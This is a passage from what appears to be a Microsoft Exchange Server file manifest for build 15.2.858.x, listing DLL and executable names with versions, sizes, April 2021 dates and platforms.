\nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.2.858.9| 21,368| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.2.858.9| 28,040| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.2.858.9| 28,544| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.2.858.9| 36,224| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.2.858.9| 16,792| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.2.858.9| 19,832| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.2.858.9| 15,232| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.2.858.9| 17,280| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.2.858.9| 19,840| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.2.858.9| 57,224| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.2.858.9| 17,816| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.2.858.9| 18,816| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.2.858.9| 16,248| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.2.858.9| 17,792| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.2.858.9| 15,248| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.2.858.9| 15,256| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.2.858.9| 52,624| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.2.858.9| 18,304| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.2.858.9| 34,176| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.2.858.9| 17,280| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.2.858.9| 18,832| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.2.858.9| 43,392| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loguploader.dll| 15.2.858.9| 165,256| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.2.858.9| 54,656| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.2.858.10| 9,055,616| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.2.858.9| 33,160| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.2.858.10| 124,304| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.2.858.9| 82,824| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.2.858.9| 14,216| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.2.858.10| 30,088| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.2.858.10| 661,384| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.2.858.10| 63,368| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.2.858.10| 175,488| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.2.858.10| 2,791,808| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.2.858.10| 53,128| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.2.858.10| 151,936| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.2.858.10| 966,528| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.2.858.10| 185,224| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.2.858.9| 31,616| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.2.858.10| 39,816| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.2.858.10| 105,856| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.2.858.10| 95,104| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.2.858.10| 43,400| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.2.858.9| 18,816| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.2.858.10| 172,936| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.2.858.10| 102,784| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.2.858.10| 98,696| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.2.858.10| 188,824| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.2.858.10| 43,400| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.2.858.9| 447,368| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.2.858.10| 89,992| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.2.858.10| 107,928| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.2.858.10| 371,088| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.2.858.10| 193,928| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.2.858.10| 552,320| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.2.858.9| 16,256| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.2.858.9| 15,736| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.2.858.10| 321,416| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.2.858.10| 45,464| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.2.858.10| 18,296| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.2.858.9| 20,888| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.2.858.9| 415,112| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.2.858.9| 1,269,648| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.2.858.10| 39,312| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.2.858.9| 433,528| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.2.858.10| 4,566,400| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.2.858.9| 261,000| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.2.858.9| 33,672| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.2.858.9| 94,096| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.management.deployment.dll| 15.2.858.10| 586,136| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.2.858.9| 3,543,424| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.2.858.10| 67,992| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.dll| 15.2.858.10| 16,496,008| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.2.858.10| 58,776| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.2.858.10| 23,952| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.2.858.10| 101,768| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.migration.dll| 15.2.858.10| 543,624| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.management.mobility.dll| 15.2.858.10| 305,024| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.2.858.9| 273,800| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.2.858.10| 418,688| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.2.858.10| 275,856| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.2.858.10| 70,536| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.2.858.9| 7,873,944| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.management.recipient.dll| 15.2.858.10| 1,502,096| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.2.858.10| 71,576| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.2.858.10| 1,249,152| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.management.transport.dll| 15.2.858.10| 1,876,872| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.managementgui.dll| 15.2.858.9| 5,366,656| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.managementmsg.dll| 15.2.858.9| 36,224| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.2.858.9| 117,624| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.2.858.10| 209,792| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.2.858.9| 79,744| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.2.858.9| 17,288| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.2.858.10| 156,056| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.2.858.10| 65,944| 04-Apr-2021| 08:40| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.2.858.9| 30,600| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.2.858.10| 58,248| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.2.858.10| 29,576| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.2.858.10| 175,512| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.2.858.10| 28,568| 04-Apr-2021| 08:37| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.2.858.10| 75,144| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.2.858.10| 207,240| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.2.858.10| 440,712| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.2.858.10| 83,336| 04-Apr-2021| 08:36| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.2.858.10| 35,224| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.2.858.10| 53,128| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.2.858.10| 96,656| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.migration.dll| 15.2.858.10| 1,110,424| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.2.858.9| 14,712| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.2.858.10| 135,576| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.2.858.10| 5,065,600| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.2.858.9| 19,848| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.2.858.9| 68,480| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.net.dll| 15.2.858.9| 5,086,104| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.2.858.9| 265,608| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.networksettings.dll| 15.2.858.9| 37,768| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.2.858.9| 14,200| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.2.858.10| 549,776| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.2.858.9| 22,920| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.2.858.10| 106,392| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.oauth.core.dll| 15.2.858.9| 291,736| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.2.858.9| 17,280| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.2.858.9| 277,912| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.odata.dll| 15.2.858.10| 2,993,536| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.2.858.9| 90,496| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.2.858.9| 101,768| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.2.858.9| 38,272| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.2.858.9| 45,456| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.2.858.9| 58,240| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.2.858.9| 147,336| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.2.858.9| 26,496| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.2.858.9| 184,208| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.2.858.9| 26,496| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.2.858.9| 38,288| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.2.858.9| 55,688| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.2.858.9| 147,320| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.2.858.9| 191,880| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.2.858.9| 33,688| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.partitioncache.dll| 15.2.858.9| 28,040| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.2.858.9| 32,648| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.2.858.10| 15,240| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.2.858.9| 17,280| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.2.858.9| 17,280| 04-Apr-2021| 08:34| Not applicable \nMicrosoft.exchange.pop3.exe| 15.2.858.9| 106,888| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.2.858.9| 106,888| 04-Apr-2021| 08:27| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.2.858.9| 24,976| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.2.858.9| 24,976| 04-Apr-2021| 08:27| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.2.858.9| 42,888| 04-Apr-2021| 08:32| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.2.858.9| 264,600| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.2.858.9| 264,600| 04-Apr-2021| 08:29| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.2.858.9| 358,280| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.2.858.10| 4,166,528| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.2.858.10| 308,632| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.2.858.10| 41,344| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.2.858.9| 30,584| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.2.858.9| 137,088| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.2.858.9| 441,736| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.2.858.9| 14,216| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.2.858.10| 224,664| 04-Apr-2021| 08:35| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.2.858.10| 105,864| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.pst.dll| 15.2.858.9| 168,840| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.2.858.9| 168,840| 04-Apr-2021| 08:27| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.2.858.9| 259,472| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.publicfolders.dll| 15.2.858.9| 72,072| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.2.858.9| 215,952| 04-Apr-2021| 08:37| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.2.858.9| 106,872| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.2.858.9| 425,856| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.2.858.9| 70,520| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.query.analysis.dll| 15.2.858.10| 46,472| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.query.configuration.dll| 15.2.858.9| 215,944| 04-Apr-2021| 08:36| x86 \nMicrosoft.exchange.query.core.dll| 15.2.858.10| 168,832| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.query.ranking.dll| 15.2.858.10| 343,424| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.2.858.10| 174,488| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.2.858.10| 95,112| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.2.858.10| 127,360| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.relevance.core.dll| 15.2.858.9| 63,368| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.relevance.data.dll| 15.2.858.9| 36,728| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.2.858.9| 17,800| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.relevance.people.dll| 15.2.858.10| 9,666,968| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.2.858.9| 20,788,120| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.2.858.9| 36,728| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.2.858.9| 97,672| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.2.858.9| 28,552| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.2.858.9| 72,088| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.routing.client.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.2.858.9| 13,184| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.routing.server.exe| 15.2.858.9| 59,280| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.rpc.dll| 15.2.858.9| 1,647,496| 04-Apr-2021| 08:29| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.2.858.9| 209,816| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.2.858.9| 60,288| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.2.858.9| 518,024| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.2.858.9| 161,160| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.2.858.9| 724,360| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.2.858.9| 243,088| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.2.858.9| 20,888| 04-Apr-2021| 08:29| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.2.858.10| 35,216| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.2.858.9| 42,376| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.2.858.10| 56,216| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.2.858.9| 27,544| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.rules.common.dll| 15.2.858.9| 130,440| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.2.858.10| 20,360| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.safehtml.dll| 15.2.858.9| 21,384| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.2.858.9| 267,672| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.2.858.9| 111,000| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.2.858.9| 112,520| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.2.858.9| 622,472| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.2.858.10| 185,224| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.2.858.9| 12,168| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.2.858.9| 19,320| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.search.core.dll| 15.2.858.9| 211,864| 04-Apr-2021| 08:36| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.2.858.10| 17,800| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.search.engine.dll| 15.2.858.9| 97,672| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.2.858.9| 16,792| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.search.fast.dll| 15.2.858.9| 436,616| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.search.files.dll| 15.2.858.10| 274,304| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.search.flighting.dll| 15.2.858.9| 24,968| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.search.mdb.dll| 15.2.858.9| 218,008| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.search.service.exe| 15.2.858.9| 26,520| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.2.858.9| 221,056| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.security.dll| 15.2.858.9| 1,559,960| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.2.858.9| 19,840| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.2.858.9| 28,544| 04-Apr-2021| 08:43| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.2.858.9| 225,152| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.2.858.9| 5,151,120| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.2.858.9| 214,920| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.2.858.9| 115,576| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.2.858.9| 82,824| 04-Apr-2021| 08:44| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.2.858.9| 80,768| 04-Apr-2021| 08:39| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.2.858.9| 66,440| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.2.858.9| 81,288| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.2.858.9| 211,840| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.2.858.9| 1,341,320| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.2.858.9| 511,864| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.2.858.9| 47,488| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.2.858.9| 873,856| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.2.858.9| 1,352,584| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.2.858.9| 30,600| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.2.858.9| 130,440| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.2.858.9| 1,018,776| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.2.858.9| 111,480| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.2.858.9| 34,696| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.2.858.9| 19,328| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.2.858.9| 14,720| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.servicehost.exe| 15.2.858.10| 60,824| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.2.858.9| 50,576| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.2.858.9| 14,208| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.2.858.9| 14,208| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.services.common.dll| 15.2.858.10| 74,120| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.services.dll| 15.2.858.10| 8,480,656| 